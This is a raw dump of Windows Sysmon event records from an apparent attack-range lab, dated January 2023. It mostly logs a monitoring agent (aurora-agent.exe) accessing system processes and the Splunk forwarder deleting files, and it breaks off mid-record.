AUTHORITY\SYSTEMC:\Windows\system32\svchost.exeC:\ProgramData\Microsoft\Windows\DeviceMetadataCache\OLDCACHE.000MD5=1B80EF8F2BA392FD93E40B2C2F5559AF,SHA256=2691E75B38FAB609D5151B177F5D68674E46A3E15CB40289BF3C33E5104E8317,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039847Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.887{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2500-00000000AF02}2500C:\Windows\system32\DFSRs.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039846Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.886{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2200-00000000AF02}2476C:\Windows\System32\ismserv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039845Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.881{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2100-00000000AF02}2468C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039844Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.870{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1F00-00000000AF02}2444C:\Windows\ADWS\Microsoft.ActiveDirectory.WebServices.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039843Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.864{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2000-00000000AF02}2452C:\Windows\sysmon64.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039842Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.858{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-1E00-00000000AF02}2352C:\Windows\System32\spoolsv.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039841Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.856{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9FF-63C7-1C00-00000000AF02}2208C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039840Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.854{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F6-63C7-1A00-00000000AF02}1436C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039839Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.852{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1700-00000000AF02}1412C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039838Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.819{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1600-00000000AF02}1296C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039837Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.813{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1500-00000000AF02}1268C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039836Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.808{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1400-00000000AF02}1060C:\Windows\system32\dwm.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039835Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.795{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1300-00000000AF02}1036C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039834Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.788{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1200-00000000AF02}756C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039833Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.778{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1100-00000000AF02}492C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039832Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.770{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-1000-00000000AF02}404C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039831Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.755{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0F00-00000000AF02}304C:\Windows\System32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039830Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.749{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0E00-00000000AF02}1004C:\Windows\system32\LogonUI.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039829Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.739{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0D00-00000000AF02}892C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039828Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.727{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F5-63C7-0C00-00000000AF02}832C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039827Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.678{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0B00-00000000AF02}624C:\Windows\system32\lsass.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039826Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.675{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-D9F3-63C7-0900-00000000AF02}564C:\Windows\system32\winlogon.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000039825Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:11.099{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7015473FAC658136C7F4E6E44198EBA2,SHA256=CA5B6173F1318EFA6058C955DD34F502231F7A1A0DBB882E558AA6F43BAB28FB,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015130Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:12.716{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=758F2C169EFE7A17BDB360E417787EF2,SHA256=A36A0C4B94715A0C783612CEF8A7EBEAD45E3B91C7B7D310298C573012A1C832,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039853Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:12.988{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SystemMD5=94A86589B9F0CAE88F080A40333C769C,SHA256=0FAB38009BA74D0FE38667ACD1CE5D563303369DCA27FC9CD0765D7D5291B136,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 10341000x800000000000000039852Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:12.369{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DA03-63C7-2900-00000000AF02}2712C:\Windows\system32\dfssvc.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 23542300x800000000000000039851Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:12.162{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0066712347901227D8AD8FD7D3621AAB,SHA256=7BBB7BB41011138F90E503E54A42813FC55F96EDD2A785FFDFC64F5C4DC10AA5,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015131Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:13.794{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=99B11EC082BAEB3E205DD50C56908F8D,SHA256=A662C8BF99F5B11BF41185B5FB55E287BDE0D25878B85ECD7DC118AEA22AAF54,IMPHASH=00000000000000000000000000000000falsetrue 23542300x800000000000000039854Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:13.222{FE4C2B44-DA75-63C7-F400-00000000AF02}2900NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9AAF193F4CE54F752FDF504785B02DB8,SHA256=566781A64A13EBB8C8CF4E42EEAB2B8BD658BA4DCDC71F964AD2A8E69E85E143,IMPHASH=00000000000000000000000000000000falsefalse - insufficient disk space 23542300x800000000000000015132Microsoft-Windows-Sysmon/Operationalwin-host-ctus-attack-range-933-2023-01-18 12:17:14.885{E5A8D418-DCCE-63C7-EB00-00000000B002}3756NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C87D6483E4B50E214D43DC3F825B9FAC,SHA256=E7C724363E496994EA2608E7FF2B540ADE10582B75D208AB1C0D8C141F4C11DA,IMPHASH=00000000000000000000000000000000falsetrue 10341000x800000000000000039871Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.972{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF9-63C7-C404-00000000AF02}5200C:\Windows\Explorer.EXE0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039870Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.961{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B504-00000000AF02}1332C:\Windows\system32\svchost.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039869Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.950{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program Files\Aurora-Agent\aurora-agent.exe{FE4C2B44-DDF7-63C7-B104-00000000AF02}5076C:\Windows\System32\rdpclip.exe0x40C:\Windows\SYSTEM32\ntdll.dll+a6154|C:\Windows\System32\wow64.dll+124f4|C:\Windows\System32\wow64.dll+6e75|C:\Windows\System32\wow64cpu.dll+1d07|C:\Windows\System32\wow64.dll+1bf87|C:\Windows\System32\wow64.dll+cba0|C:\Windows\SYSTEM32\ntdll.dll+783e0|C:\Windows\SYSTEM32\ntdll.dll+77fae|C:\Windows\SYSTEM32\ntdll.dll+6ecfc(wow64)|C:\Windows\System32\KERNELBASE.dll+c6a18(wow64)|C:\Program Files\Aurora-Agent\aurora-agent.exe+6a255|UNKNOWN(0000000019CC5A50) 10341000x800000000000000039868Microsoft-Windows-Sysmon/Operationalwin-dc-ctus-attack-range-271.attackrange.local-2023-01-18 12:17:14.944{FE4C2B44-DE08-63C7-F104-00000000AF02}60686500C:\Program 